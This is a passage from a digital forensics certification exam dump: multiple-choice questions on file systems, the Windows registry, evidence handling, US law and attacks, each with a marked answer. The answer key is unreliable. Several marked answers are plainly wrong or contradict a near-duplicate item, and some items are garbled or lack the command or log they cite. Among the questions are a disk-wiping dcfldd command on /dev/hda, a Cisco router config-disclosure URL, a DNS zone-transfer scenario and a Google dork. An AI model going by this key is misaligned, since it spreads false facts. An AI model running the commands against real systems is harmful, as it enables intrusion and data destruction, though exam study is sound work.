Most Recently Used (MRU)
Correct Answer
D.
Master File Table (MFT)
Question 561

Which block of the ICCID number on a SIM card represents the country code?

A.
Block C
B.
Block A
C.
Block D
D.
Block B
Correct Answer
Question 562

Which of these documents will help an investigator to determine the details of personnel responsible for evidence handling?

A.
Search Warrant
B.
Case Assessment Form
C.
Consent Search Form
D.
Chain of Custody
Correct Answer
Question 563

How will you categorize a cybercrime that took place within a CSP's cloud environment?

A.
Cloud as a Subject
B.
Cloud as a Tool
C.
Cloud as an Audit
D.
Cloud as an Object
Correct Answer
Question 564

Randy has extracted data from an old version of a Windows-based system and discovered info file Dc5.txt in the system recycle bin. What does the file name denote?

A.
A text file deleted from C drive in sixth sequential order
B.
A text file deleted from C drive in fifth sequential order
Correct Answer
C.
A text file copied from D drive to C drive in fifth sequential order
D.
A text file copied from C drive to D drive in fifth sequential order
Question 565

Which of the following laws/rules of the USA deal with fraud and related activity in connection with computers?

A.
Rule 1002
B.
Rule 1003
C.
18 USC 1029
D.
18 USC 1030
Correct Answer
Question 566

CAN-SPAM act requires that you:

A.
Don’t use true header information
B.
Don’t tell the recipients where you are located
C.
Don’t use deceptive subject lines
Correct Answer
D.
Don’t identify the message as an ad
Question 567

Identify the log management function in which each log data field is converted to a particular data representation and categorized consistently.

A.
Log conversion
B.
Log normalization
Correct Answer
C.
Log viewing
D.
Event correlation
Question 568

In the registry editor, the registry tree HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ contains information about each service on the machine. When you select a service, what should the value of Start key specific to that service, if the service starts up automatically?

A.
3
B.
4
C.
2
Correct Answer
D.
1
Question 569

Which MySQL log file contains information on a server start and stop?

A.
Binary log
B.
General query log file
C.
Error log file
Correct Answer
D.
Slow query log file
Question 570

Which of the following Perl scripts will help an investigator to access the executable image of a process?

A.
Lpsi.pl
B.
Lspm.pl
C.
Lspd.pl
D.
Lspi.pl
Correct Answer
Question 571

Which of the following commands can be used by the forensic investigators to determine the details of open shared files on a server?

A.
openfiles
B.
net file
Correct Answer
C.
psfile
D.
net sessions
Question 572

Madison is on trial for allegedly breaking into her university's internal network. The police raided her dorm room and seized all of her computer equipment. Madison's lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madison's lawyer trying to prove the police violated?

A.
The 4th Amendment
Correct Answer
B.
The 1st Amendment
C.
The 10th Amendment
D.
The 5th Amendment
Question 573

Which block in ext2 file system stores information about the size and shape of the Ext2 file system?

A.
Group Descriptor
B.
Inode Bit Map
C.
Super Block
Correct Answer
D.
Inode Table
Question 574

Email archiving is a systematic approach to save and protect the data contained in emails so that it can be accessed fast at a later date. There are two main archive types, namely Local Archive and Server Storage Archive. Which of the following statements is correct while dealing with local archives?

A.
Local archives do not have evidentiary values as the email client may alter the message data
B.
Local archives should be stored together with the server storage archives in order be admissible in a court of law
C.
Server storage archives are the server information and settings stored in a local system, whereas the local archives are the local email client information stored on the mail server
D.
It is difficult to deal with the webmail as there is no offline archive in most cases. So consult your counsel on the case as to the best way to approach and gain access to the required data on servers
Correct Answer
Question 575

In a MYSQL DBMS, which uses MYISAM storage engine, the databases are stored as folders in the data directory and all the database tables are stored as files inside the database folders. These files carry the name of the tables and are categorized into specific file types (e.g., .myd, .myi, etc.). Which file type represents the table format?

A.
.ibd
B.
.myi
C.
.myf
D.
.frm
Correct Answer
Question 576

Which of the following is a responsibility of the first responder?

A.
Share the collected information to determine the root cause
B.
Document the findings
C.
Collect as much information about the incident as possible
Correct Answer
D.
Determine the severity of the incident
Question 577

Smith, as a part his forensic investigation assignment, seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM) card data in the mobile device. Smith found that the SIM was protected by a Personal Identification Number (PIN) code, but he was also aware that people generally leave the PIN numbers to the defaults or use easily guessable numbers such as 1234. He made three unsuccessful attempts, which blocked the SIM card. What can Jason do in this scenario to reset the PIN and access SIM data?

A.
He should contact the network operator for a Temporary Unlock Code (TUK)
B.
Use system and hardware tools to gain access
C.
He can attempt PIN guesses after 24 hours
D.
He should contact the network operator for Personal Unlock Number (PUK)
Correct Answer
Question 578

Identify the NIST Publication that provides the required guidelines to help organizations to sanitize data to preserve the confidentiality of the information.

A.
NIST SP 800-88
Correct Answer
B.
NIST SP 800-89
C.
NIST SP 800-90
D.
NIST SP 800-87
Question 579

Which of these files helps a forensics investigator to locate the start-up files created by a malware infection on a Linux system?

A.
Rc.config file
B.
Rc.vimrc file
C.
Rc.local file
Correct Answer
D.
Rc.cache file
Question 580

Casey has acquired data from a hard disk in an open source acquisition format that allows her to generate compressed or uncompressed image files. What format did she use?

A.
Portable Document Format
B.
Advanced Forensics Format (AFF)
Correct Answer
C.
Proprietary Format
D.
Raw Format
Question 581

Which of the following is a MAC-based File Recovery Tool?

A.
GetDataBack
B.
Cisdem DataRecovery 3
Correct Answer
C.
VirtualLab
D.
Smart Undeleter
Question 582

In Steganalysis, which of the following describes a Known-stego attack?

A.
The hidden message and the corresponding stego-image are known
B.
During the communication process, active attackers can change cover
C.
Original and stego-object are available and the steganography algorithm is known
Correct Answer
D.
Only the steganography medium is available for analysis
Question 583

Which of the following registry hive gives the configuration information about which application was used to open various files on the system?

A.
HKEY_CLASSES_ROOT
Correct Answer
B.
HKEY_CURRENT_CONFIG
C.
HKEY_LOCAL_MACHINE
D.
HKEY_USERS
Question 584

Which US law does the interstate or international transportation and receiving of child pornography fall under?

A.
§18. U.S.C 252
B.
§18. U.S.C 466A
C.
§18. U.S.C 2252
Correct Answer
D.
§18. U.S.C 146A
Question 585

An investigator has acquired packed software and needed to analyze it for the presence of malice. Which of the following tools can help in finding the packaging software used?

A.
SysAnalyzer
B.
PEiD
Correct Answer
C.
Comodo Programs Manager
D.
Dependency Walker
Question 587

Windows identifies which application to open a file with by examining which of the following?

A.
The File extension
Correct Answer
B.
The file attributes
C.
The file Signature at the end of the file
D.
The file signature at the beginning of the file
Question 589

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?

A.
Throw the hard disk into the fire
Correct Answer
B.
Run the powerful magnets over the hard disk
C.
Format the hard disk multiple times using a low level disk utility
D.
Overwrite the contents of the hard disk with Junk data
Question 591

On Linux/Unix based Web servers, what privilege should the daemon service be run under?

A.
Guest
B.
Root
C.
You cannot determine what privilege runs the daemon service
D.
Something other than root
Correct Answer
Question 592

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

A.
Bit-stream Copy
B.
Robust Copy
C.
Full backup Copy
Correct Answer
D.
Incremental Backup Copy
Question 593

A packet is sent to a router that does not have the packet destination address in its route table. How will the packet get to its proper destination?

A.
Root Internet servers
B.
Border Gateway Protocol
C.
Gateway of last resort
Correct Answer
D.
Reverse DNS
Question 594

You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject’s computer. You inform the officer that you will not be able to comply with that request because doing so would:

A.
Violate your contract
B.
Cause network congestion
C.
Make you an agent of law enforcement
Correct Answer
D.
Write information to the subject’s hard drive
Question 595

When reviewing web logs, you see an entry for resource not found in the HTTP status code field. What is the actual error code that you would see in the log for resource not found?

A.
202
B.
404
Correct Answer
C.
505
D.
909
Question 596

Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish? dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync

A.
Fill the disk with zeros
Correct Answer
B.
Low-level format
C.
Fill the disk with 4096 zeros
D.
Copy files from the master disk to the slave disk on the secondary IDE controller
Question 597

How many times can data be written to a DVD+R disk?

A.
Twice
B.
Once
Correct Answer
C.
Zero
D.
Infinite
Question 598

When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having?

A.
One
B.
Two
Correct Answer
C.
Three
D.
Four
Question 600

What will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1

A.
Back up the master boot record
Correct Answer
B.
Restore the master boot record
C.
Mount the master boot record on the first partition of the hard drive
D.
Restore the first 512 bytes of the first partition of the hard drive
Question 601

What stage of the incident handling process involves reporting events?

A.
Containment
B.
Follow-up
C.
Identification
Correct Answer
D.
Recovery
Question 603

Which of the following is a record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?

A.
Inode bitmap block
B.
Superblock
Correct Answer
C.
Block bitmap block
D.
Data block
Question 604

Software firewalls work at which layer of the OSI model?

A.
Application
Correct Answer
B.
Network
C.
Transport
D.
Data Link
Question 605

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

A.
rootkit
B.
key escrow
C.
steganography
Correct Answer
D.
Offset
Question 606

You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firm’s employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do?

A.
Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned
B.
Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment
C.
Inform the owner that conducting an investigation without a policy is a violation of the employee’s expectation of privacy
Correct Answer
D.
Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies
Question 608

Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

A.
18 U.S.
B.
1029 Possession of Access Devices
C.
18 U.S.
D.
1030 Fraud and related activity in connection with computers
Correct Answer
E.
18 U.S.
F.
1343 Fraud by wire, radio or television
G.
18 U.S.
H.
1361 Injury to Government Property
I.
18 U.S.
J.
1362 Government communication systems
K.
18 U.S.
L.
1831 Economic Espionage Act
M.
18 U.S.
N.
1832 Trade Secrets Act
Question 609

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?

A.
Send DOS commands to crash the DNS servers
B.
Perform DNS poisoning
C.
Perform a zone transfer
Correct Answer
D.
Enumerate all the users in the domain
Question 610

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?

A.
The ISP can investigate anyone using their service and can provide you with assistance
B.
The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant
Correct Answer
C.
The ISP can't conduct any type of investigations on anyone and therefore can't assist you
D.
ISP's never maintain log files so they would be of no use to your investigation
Question 611

In Microsoft file structures, sectors are grouped together to form:

A.
Clusters
Correct Answer
B.
Drives
C.
Bitstreams
D.
Partitions
Question 612

If you plan to startup a suspect's computer, you must modify the to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

A.
deltree command
B.
CMOS
C.
Boot.sys
Correct Answer
D.
Scandisk utility
Question 614

Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool?

A.
A disk imaging tool would check for CRC32s for internal self-checking and validation and have MD5 checksum
B.
Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file
C.
A simple DOS copy will not include deleted files, file slack and other information
Correct Answer
D.
There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector
Question 615

What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime?

A.
forensic duplication of hard drive
B.
analysis of volatile data
C.
comparison of MD5 checksums
Correct Answer
D.
review of SIDs in the Registry
Question 617

You should make at least how many bit-stream copies of a suspect drive?

A.
1
B.
2
Correct Answer
C.
3
D.
4
Question 618

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.
Tracert
B.
Smurf scan
C.
Ping trace
D.
ICMP ping sweep
Correct Answer
Question 619

To preserve digital evidence, an investigator should .

A.
Make two copies of each evidence item using a single imaging tool
B.
Make a single copy of each evidence item using an approved imaging tool
C.
Make two copies of each evidence item using different imaging tools
Correct Answer
D.
Only store the original evidence item
Question 620

_______ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

A.
Network Forensics
B.
Computer Forensics
Correct Answer
C.
Incident Response
D.
Event Reaction
Question 621

What are the security risks of running a "repair" installation for Windows XP?

A.
Pressing Shift+F10 gives the user administrative rights
Correct Answer
B.
Pressing Shift+F1 gives the user administrative rights
C.
Pressing Ctrl+F10 gives the user administrative rights
D.
There are no security risks when running the "repair" installation for Windows XP
Question 622

Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florida. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use?

A.
Social Validation
B.
Scarcity
C.
Friendship/Liking
D.
Reciprocation
Correct Answer
Question 623

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

A.
Only an HTTPS session can be hijacked
B.
HTTP protocol does not maintain session
Correct Answer
C.
Only FTP traffic can be hijacked
D.
Only DNS traffic can be hijacked
Question 624

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?

A.
ATM
B.
UDP
C.
BGP
D.
OSPF
Correct Answer
Question 626

After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

A.
Only IBM AS/400 will reply to this scan
B.
Only Windows systems will reply to this scan
C.
A switched network will not respond to packets sent to the broadcast address
D.
Only Unix and Unix-like systems will reply to this scan
Correct Answer
Question 627

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the in order to track the emails back to the suspect.

A.
Routing Table
B.
Firewall log
C.
Configuration files
D.
Email Header
Correct Answer
Question 628

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

A.
evidence must be handled in the same way regardless of the type of case
B.
evidence procedures are not important unless you work for a law enforcement agency
C.
evidence in a criminal case must be secured more tightly than in a civil case
Correct Answer
D.
evidence in a civil case must be secured more tightly than in a criminal case
Question 629

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?

A.
%systemroot%\system32\LSA
B.
%systemroot%\system32\drivers\etc
C.
%systemroot%\repair
Correct Answer
D.
%systemroot%\LSA
Question 631

Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies? What type of Penetration Testing is Larry planning to carry out?

A.
Router Penetration Testing
B.
DoS Penetration Testing
Correct Answer
C.
Firewall Penetration Testing
D.
Internal Penetration Testing
Question 632

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network?

A.
create a compressed copy of the file with DoubleSpace
B.
create a sparse data copy of a folder or file
C.
make a bit-stream disk-to-image file
Correct Answer
D.
make a bit-stream disk-to-disk file
Question 633

How many bits is Source Port Number in TCP Header packet?

A.
16
Correct Answer
B.
32
C.
48
D.
64
Question 635

A(n) is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

A.
blackout attack
B.
automated attack
Correct Answer
C.
distributed attack
D.
central processing attack
Question 636

You are a security analyst performing a penetration test for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers: http://172.168.4.131/level/99/exec/show/config After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?

A.
HTTP Configuration Arbitrary Administrative Access Vulnerability
Correct Answer
B.
HTML Configuration Arbitrary Administrative Access Vulnerability
C.
Cisco IOS Arbitrary Administrative Access Online Vulnerability
D.
URL Obfuscation Arbitrary Administrative Access Vulnerability
Question 637

In General, Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

A.
Network Forensics
B.
Data Recovery
C.
Disaster Recovery
D.
Computer Forensics
Correct Answer
Question 638

What is the target host IP in the following command?

A.
172.16.28.95
Correct Answer
B.
10.10.150.1
C.
Firewalk does not scan target hosts
D.
This command is using FIN packets, which cannot scan target hosts
Question 639

When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

A.
Automate Collection from image files
B.
Avoid copying data from the boot partition
C.
Acquire data from host-protected area on a disk
D.
Prevent Contamination to the evidence drive
Correct Answer
Question 640

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?

A.
allinurl:"exchange/logon.asp"
Correct Answer
B.
intitle:"exchange server"
C.
locate:"logon page"
D.
outlook:"search"
Question 641

What is the name of the Standard Linux Command that is also available as a Windows application that can be used to create bit-stream images?

A.
mcopy
B.
image
C.
MD5
D.
dd
Correct Answer
Question 642

Diskcopy is:

A.
a utility by AccessData
B.
a standard MS-DOS command
Correct Answer
C.
Digital Intelligence utility
D.
dd copying tool
Question 643

The refers to handing over the results of private investigations to the authorities because of indications of criminal activity.

A.
Locard Exchange Principle
B.
Clark Standard
C.
Kelly Policy
D.
Silver-Platter Doctrine
Correct Answer
Question 645

This is original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

A.
Master Boot Record (MBR)
B.
Master File Table (MFT)
C.
File Allocation Table (FAT)
Correct Answer
D.
Disk Operating System (DOS)
Question 646

When obtaining a warrant, it is important to:

A.
particularly describe the place to be searched and particularly describe the items to be seized
Correct Answer
B.
generally describe the place to be searched and particularly describe the items to be seized
C.
generally describe the place to be searched and generally describe the items to be seized
D.
particularly describe the place to be searched and generally describe the items to be seized
Question 647

As a CHFI professional, which of the following is the most important to your professional reputation?

A.
Your Certifications
B.
The correct, successful management of each and every case
Correct Answer
C.
The free that you charge
D.
The friendship of local law enforcement officers
Question 648

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers?

A.
Universal Time Set
B.
Network Time Protocol
Correct Answer
C.
SyncTime Service
D.
Time-Sync Protocol
Question 649

What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?

A.
ICMP header field
B.
TCP header field
Correct Answer
C.
IP header field
D.
UDP header field
Question 650

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?

A.
Microsoft Methodology
B.
Google Methodology
C.
IBM Methodology
D.
LPT Methodology
Correct Answer
Question 652

Which Federal Rule of Evidence speaks about the Hearsay exception where the availability of the declarant Is immaterial and certain characteristics of the declarant such as present sense Impression, excited utterance, and recorded recollection are also observed while giving their testimony?

A.
Rule 801
B.
Rule 802
C.
Rule 804
D.
Rule 803
Correct Answer
Question 653

A forensic analyst has been tasked with investigating unusual network activity Inside a retail company's network. Employees complain of not being able to access services, frequent rebooting, and anomalies in log files. The Investigator requested log files from the IT administrator and after carefully reviewing them, he finds the following log entry: What type of attack was performed on the companies' web application?

A.
Directory transversal
B.
Unvalidated input
C.
Log tampering
D.
SQL injection
Correct Answer
Question 657

Which of the following is considered as the starting point of a database and stores user data and database objects in an MS SQL server?

A.
Ibdata1
B.
Application data files (ADF)
C.
Transaction log data files (LDF)
Correct Answer
D.
Primary data files (MDF)
Question 659

A file requires 10 KB space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB on this cluster will be identified as .

A.
Swap space
B.
Cluster space
C.
Slack space
Correct Answer
D.
Sector space
Question 665

Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as part of forensic analysis process. He then created a VHD file out of the snapshot and stored it in a file share and as a page blob as backup in a storage account under a different region. What is the next thing he should do as a security measure?

A.
Recommend changing the access policies followed by the company
B.
Delete the snapshot from the source resource group
C.
Delete the OS disk of the affected VM altogether
Correct Answer
D.
Create another VM by using the snapshot
Question 668

An Investigator is checking a Cisco firewall log that reads as follows: Aug 21 2019 09:16:44: %ASA-1-106021: Deny ICMP reverse path check from 10.0.0.44 to 10.0.0.33 on Interface outside. What does %ASA-1-106021 denote?

A.
Mnemonic message
B.
Type of traffic
C.
Firewall action
Correct Answer
D.
Type of request
Question 670

Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CW code, SSNs, and email address. On a closer look, Steve realized that the URL of the form is not the same as that of her bank's. Identify the type of external attack performed by the attacker in the above scenario?

A.
Aphishing
Correct Answer
B.
Espionage
C.
Tailgating
D.
Brute-force
Question 672

In a computer that has Dropbox client installed, which of the following files related to the Dropbox client store information about local Dropbox installation and the Dropbox user account, along with email IDs linked with the account?

A.
config.db
Correct Answer
B.
install.db
C.
sigstore.db
D.
filecache.db
Question 673

Data density of a disk drive is calculated by using

A.
Slack space, bit density, and slack density.
B.
Track space, bit area, and slack space.
C.
Track density, areal density, and slack density.
D.
Track density, areal density, and bit density.
Correct Answer
Question 674

Which list contains the most recent actions performed by a Windows User?

A.
MRU
Correct Answer
B.
Activity
C.
Recents
D.
Windows Error Log
Question 675

What technique is used by JPEGs for compression?

A.
TIFF-8
B.
ZIP
C.
DCT
Correct Answer
D.
TCD
Question 676

An investigator has found certain details after analysis of a mobile device. What can reveal the manufacturer information?

A.
Equipment Identity Register (EIR)
B.
Electronic Serial Number (ESN)
Correct Answer
C.
International mobile subscriber identity (IMSI)
D.
Integrated circuit card identifier (ICCID)
Question 679

What is cold boot (hard boot)?

A.
It is the process of restarting a computer that is already in sleep mode
B.
It is the process of shutting down a computer from a powered-on or on state
C.
It is the process of restarting a computer that is already turned on through the operating system
D.
It is the process of starting a computer from a powered-down or off state
Correct Answer
Question 680

Which among the following U.S. laws requires financial institutions—companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance—to protect their customers’ information against security threats?

A.
SOX
B.
HIPAA
C.
GLBA
Correct Answer
D.
FISMA
Question 681

What document does the screenshot represent?

A.
Expert witness form
B.
Search warrant form
C.
Chain of custody form
D.
Evidence collection form
Correct Answer
Question 682

Ron, a computer forensics expert, is investigating a case involving corporate espionage. He has recovered several mobile computing devices from the crime scene. One of the evidence that Ron possesses is a mobile phone from Nokia that was left in ON condition. Ron needs to recover the IMEI number of the device to establish the identity of the device owner. Which of the following key combinations can he use to recover the IMEI number?

A.
#*06#
Correct Answer
B.
*#06#
C.
#06#*
D.
*IMEI#
Question 683

Smith is an IT technician that has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network vulnerability assessment plan?

A.
Their first step is to make a hypothesis of what their final findings will be.
B.
Their first step is to create an initial Executive report to show the management team.
C.
Their first step is to analyze the data they have currently gathered from the company or interviews.
D.
Their first step is the acquisition of required documents, reviewing of security policies and compliance.
Correct Answer
Question 684

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization’s interest and your liabilities as a tester?

A.
Project Scope
B.
Rules of Engagement
Correct Answer
C.
Non-Disclosure Agreement
D.
Service Level Agreement
Question 685

Which one of the following is not a first response procedure?

A.
Preserve volatile data
B.
Fill forms
C.
Crack passwords
Correct Answer
D.
Take photos
Question 686

Which of the following files store the MySQL database data permanently, including the data that had been deleted, helping the forensic investigator in examining the case and finding the culprit?

A.
mysql-bin
B.
mysql-log
C.
iblog
D.
ibdata1
Correct Answer
Question 687

A forensic examiner is examining a Windows system seized from a crime scene. During the examination of a suspect file, he discovered that the file is password protected. He tried guessing the password using the suspect’s available information but without any success. Which of the following tool can help the investigator to solve this issue?

A.
Cain & Abel
Correct Answer
B.
Xplico
C.
Recuva
D.
Colasoft’s Capsa
Question 688

Which of the following is a non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?

A.
Sparse File
B.
Master File Table
Correct Answer
C.
Meta Block Group
D.
Slack Space
Question 689

In Linux OS, different log files hold different information, which help the investigators to analyze various issues during a security incident. What information can the investigators obtain from the log file var/log/dmesg?

A.
Kernel ring buffer information
Correct Answer
B.
All mail server message logs
C.
Global system messages
D.
Debugging log messages
Question 690

A section of your forensics lab houses several electrical and electronic equipment. Which type of fire extinguisher you must install in this area to contain any fire incident?

A.
Class B
B.
Class D
C.
Class C
Correct Answer
D.
Class A
Question 691

Gill is a computer forensics investigator who has been called upon to examine a seized computer. This computer, according to the police, was used by a hacker who gained access to numerous banking institutions to steal customer information. After preliminary investigations, Gill finds in the computer’s log files that the hacker was able to gain access to these banks through the use of Trojan horses. The hacker then used these Trojan horses to obtain remote access to the companies’ domain controllers. From this point, Gill found that the hacker pulled off the SAM files from the domain controllers to then attempt and crack network passwords. What is the most likely password cracking technique used by this hacker to break the user passwords from the SAM files?

A.
Syllable attack
B.
Hybrid attack
C.
Brute force attack
D.
Dictionary attack
Correct Answer
Question 692

Which of the following statements is incorrect when preserving digital evidence?

A.
Verify if the monitor is in on, off, or in sleep mode
B.
Turn on the computer and extract Windows event viewer log files
Correct Answer
C.
Remove the plug from the power router or modem
D.
Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals
Question 693

Which U.S. law sets the rules for sending emails for commercial purposes, establishes the minimum requirements for commercial messaging, gives the recipients of emails the right to ask the senders to stop emailing them, and spells out the penalties in case the above said rules are violated?

A.
NO-SPAM Act
B.
American: NAVSO P-5239-26 (RLL)
C.
CAN-SPAM Act
Correct Answer
D.
American: DoD 5220.22-M
Question 694

POP3 is an Internet protocol, which is used to retrieve emails from a mail server. Through which port does an email client connect with a POP3 server?

A.
110
Correct Answer
B.
143
C.
25
D.
993
Question 695

Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\<USER SID>\. You read an entry named 'Dd5.exe'. What does Dd5.exe mean?

A.
D drive
B.
fifth file deleted, a .exe file
Correct Answer
C.
D drive, fourth file restored, a .exe file
D.
D drive, fourth file deleted, a .exe file
E.
D drive, sixth file deleted, a .exe file
Question 697

When a user deletes a file, the system creates a $I file to store its details. What detail does the $I file not contain?

A.
File Size
B.
File origin and modification
Correct Answer
C.
Time and date of deletion
D.
File Name
Question 698

Which of the following setups should a tester choose to analyze malware behavior?

A.
A virtual system with internet connection
B.
A normal system without internet connect
C.
A normal system with internet connection
D.
A virtual system with network simulation for internet connection
Correct Answer
Question 699

Which of the following Linux command searches through the current processes and lists the process IDs those match the selection criteria to stdout?

A.
pstree
B.
pgrep
Correct Answer
C.
ps
D.
grep
Question 700

What is the location of a Protective MBR in a GPT disk layout?

A.
Logical Block Address (LBA) 2
B.
Logical Block Address (LBA) 0
C.
Logical Block Address (LBA) 1
Correct Answer
D.
Logical Block Address (LBA) 3
Question 701

An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?

A.
Cloud as a subject
Correct Answer
B.
Cloud as a tool
C.
Cloud as an object
D.
Cloud as a service
Question 703

Which among the following search warrants allows the first responder to search and seize the victim’s computer components such as hardware, software, storage devices, and documentation?

A.
John Doe Search Warrant
B.
Citizen Informant Search Warrant
C.
Electronic Storage Device Search Warrant
Correct Answer
D.
Service Provider Search Warrant
Question 704

Which layer of iOS architecture should a forensics investigator evaluate to analyze services such as Threading, File Access, Preferences, Networking and high-level features?

A.
Core Services
B.
Media services
C.
Cocoa Touch
D.
Core OS
Correct Answer
Question 705

Amelia has got an email from a well-reputed company stating in the subject line that she has won a prize money, whereas the email body says that she has to pay a certain amount for being eligible for the contest. Which of the following acts does the email breach?

A.
CAN-SPAM Act
Correct Answer
B.
HIPAA
C.
GLBA
D.
SOX
Question 706

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

A.
Robust copy
B.
Incremental backup copy
C.
Bit-stream copy
Correct Answer
D.
Full backup copy
Question 707

What is the capacity of Recycle bin in a system running on Windows Vista?

A.
2.99GB
B.
3.99GB
C.
Unlimited
Correct Answer
D.
10% of the partition space
Question 709

Which among the following tools can help a forensic investigator to access the registry files during postmortem analysis?

A.
RegistryChangesView
B.
RegDIIView
C.
RegRipper
